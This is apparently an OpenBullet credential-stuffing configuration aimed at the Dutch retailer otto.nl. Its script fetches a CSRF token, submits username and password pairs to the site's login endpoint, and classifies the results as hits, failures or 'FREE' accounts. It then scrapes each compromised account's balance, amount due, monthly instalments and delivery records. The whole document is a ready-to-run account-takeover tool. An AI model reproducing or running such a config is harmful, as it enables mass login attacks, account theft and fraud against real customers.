[SETTINGS]
{
  "Name": "Otto.nl",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2020-05-09T08:38:50.1642503+08:00",
  "AdditionalInfo": "",
  "Author": "Dedrilath",
  "Version": "1.4.2HF [Anomaly]",
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "Base64": "",
  "Grayscale": false,
  "RemoveLines": false,
  "RemoveNoise": false,
  "Dilate": false,
  "Threshold": 1.0,
  "DiffKeep": 0.0,
  "DiffHide": 0.0,
  "Saturate": false,
  "Saturation": 0.0,
  "Transparent": false,
  "Contour": false,
  "OnlyShow": false,
  "ContrastGamma": false,
  "Contrast": 1.0,
  "Gamma": 1.0,
  "Brightness": 1.0,
  "RemoveLinesMin": 0,
  "RemoveLinesMax": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST GET "https://www.otto.nl/login/" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

PARSE "<SOURCE>" LR "<meta name=\"_csrf\" content=\"" "\" />" -> VAR "Token" 

REQUEST POST "https://www.otto.nl/logincheck/" 
  CONTENT "successUrl=https%3A%2F%2Fwww.otto.nl%2Faccount%2F&failureUrl=https%3A%2F%2Fwww.otto.nl%2Flogin%2F%3Ferror%3D1%23login-form-anchor&mergeList=true&_csrf=<Token>&emailAddress=<USER>&password=<PASS>&remember-me=on" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "Mijn overzicht" 
  KEYCHAIN Failure OR 
    KEY "<ADDRESS>" Contains "https://www.otto.nl/login/?error=1" 
  KEYCHAIN Custom "FREE" OR 
    KEY "Te betalen:" 

PARSE "<SOURCE>" LR "<div class=\"subtitle\">Saldo&nbsp;<span class=\"zero\">" "</span></div>" CreateEmpty=FALSE -> CAP "Saldo" 

PARSE "<SOURCE>" LR "Te betalen:&nbsp;<span class=\"negative\">" "</span></div>" CreateEmpty=FALSE -> CAP "Te betalen" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "class=\"zero\">€ 0,00</span></div>" 
  KEYCHAIN Custom "FREE" OR 
    KEY "Te betalen:&nbsp;<span class=\"negative\">" 

REQUEST GET "https://www.otto.nl/account/bookings/overview/" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

PARSE "<SOURCE>" LR "<span class=\"message red\">" "</span>" CreateEmpty=FALSE -> CAP "Maandelijkse termijn" 

PARSE "<SOURCE>" LR "Levering van " ", nummer " Recursive=TRUE CreateEmpty=FALSE -> CAP "Levering" 

